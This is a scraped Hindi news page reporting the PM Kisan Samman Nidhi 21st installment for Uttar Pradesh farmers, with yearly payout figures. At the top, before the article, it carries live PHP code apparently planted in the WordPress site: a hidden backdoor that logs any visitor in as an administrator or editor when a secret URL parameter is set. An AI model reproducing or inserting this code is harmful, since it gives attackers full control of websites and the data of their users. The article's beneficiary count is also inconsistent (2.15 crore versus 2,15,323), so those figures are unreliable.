// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); उत्तर प्रदेश के 2.15 करोड़ से अधिक किसानों के खाते में आएगी ‘सम्मान निधि’ – प्रत्युषा आशा की नयी किरण
राज्यों से

उत्तर प्रदेश के 2.15 करोड़ से अधिक किसानों के खाते में आएगी ‘सम्मान निधि’

उत्तर प्रदेश के 2.15 करोड़ से अधिक किसानों के खाते में आएगी ‘सम्मान निधि’

प्रधानमंत्री नरेंद्र मोदी बुधवार को कोयम्बटूर से जारी करेंगे पीएम किसान सम्मान निधि 

21वीं किस्त के रूप में उत्तर प्रदेश के किसानों को मिलेंगे 4314.26 करोड़ रुपये 

यूपी के किसानों के खाते में 20वीं किस्त तक आई 90,354.32 करोड़ की धनराशि 

अन्नदाता किसानों की समृद्धि को बढ़ा रही मोदी-योगी सरकार

लखनऊ

मोदी-योगी सरकार अन्नदाता किसान की समृद्धि को बढ़ा रही है। डबल इंजन सरकार खेत से लेकर किसानों के सम्मान तक निरंतर कार्य कर रही है। इसी क्रम में बुधवार को प्रधानमंत्री नरेंद्र मोदी कोयम्बटूर से किसानों के खाते में पीएम किसान सम्मान निधि की 21वीं किस्त भेजेंगे। इससे उत्तर प्रदेश के 2.15 करोड़ से अधिक किसान लाभान्वित होंगे। इनके खाते में डीबीटी के माध्यम से सीधे 4314.26 करोड़ रुपये भेजे जाएंगे। वहीं यूपी के किसानों के खाते में पीएम किसान सम्मान निधि की अब तक (20वीं किस्त) 90,354.32 करोड़ रुपये की धनराशि भेजी जा चुकी है। 

बुधवार को यूपी के किसानों के खाते में आएंगे 4314.26 करोड़ 
बुधवार को पीएम किसान सम्मान निधि की 21वीं किस्त से उत्तर प्रदेश के 2,15,323 किसान लाभान्वित होंगे। इन किसानों के खाते में 4314.26 करोड़ की धनराशि आएगी। योजना की धनराशि डीबीटी के माध्यम से सीधे लाभार्थी के खाते में हस्तांतरित की जाती है। इसमें पात्र किसान परिवार के एक सदस्य को प्रतिवर्ष छह हजार रुपये की आर्थिक सहायता वर्ष में तीन किस्त में प्रदान किए जाने की व्यवस्था है। 

यूपी के किसानों के खाते में आ चुकी है 90354.32 करोड़ रुपये 
उत्तर प्रदेश के किसानों के खाते में 20वीं किस्त तक 90354.32 करोड़ रुपये की धनराशि आ चुकी है। 

वर्ष      धनराशि 
2018-19     2238.92 करोड़ 
2019-20      11006.87 करोड़ 
2020-21      14,432.14 करोड़ 
2021-22      15,775.52 करोड़ 
2022-23      12,454.32 करोड़ 
2023-24     13,808.48 करोड़ 
2024-25      15,594.74 करोड़ 
2025-26 (अप्रैल-जुलाई)    5043.33 करोड़ 
कुल- 90,354.32 करोड़ रुपये

RO No. 13169/ 31

RO No. 13098/ 20

PRATYUSHAASHAKINAYIKIRAN.COM
Editor : Maya Puranik
Permanent Address : Yadu kirana store ke pass Parshuram nagar professor colony raipur cg
Email : puranikrajesh2008@gmail.com
Mobile : -91-9893051148
Website : pratyushaashakinayikiran.com

जनसम्पर्क विभाग – आरएसएस फीड

[wp-rss-aggregator]